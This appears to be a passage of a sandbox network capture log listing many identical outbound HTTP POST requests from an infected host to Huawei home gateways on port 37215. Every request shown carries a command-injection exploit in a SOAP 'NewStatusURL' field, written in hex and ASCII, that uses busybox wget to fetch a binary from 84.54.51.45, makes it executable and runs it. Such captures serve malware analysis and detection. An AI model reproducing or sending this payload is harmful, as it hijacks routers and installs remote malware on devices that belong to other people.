                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26192.168.2.155890641.2.2.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731858969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27192.168.2.155891041.82.149.21337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731861115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28192.168.2.153902241.236.153.22137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731887102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29192.168.2.155980641.69.166.10837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731893063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            30192.168.2.154432441.222.209.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731914043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            31192.168.2.154471841.121.136.8537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731945038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            32192.168.2.153354641.29.9.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732004881 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            33192.168.2.155962441.226.150.10337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732004881 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            34192.168.2.155524241.38.33.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732073069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            35192.168.2.154959241.30.29.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732073069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
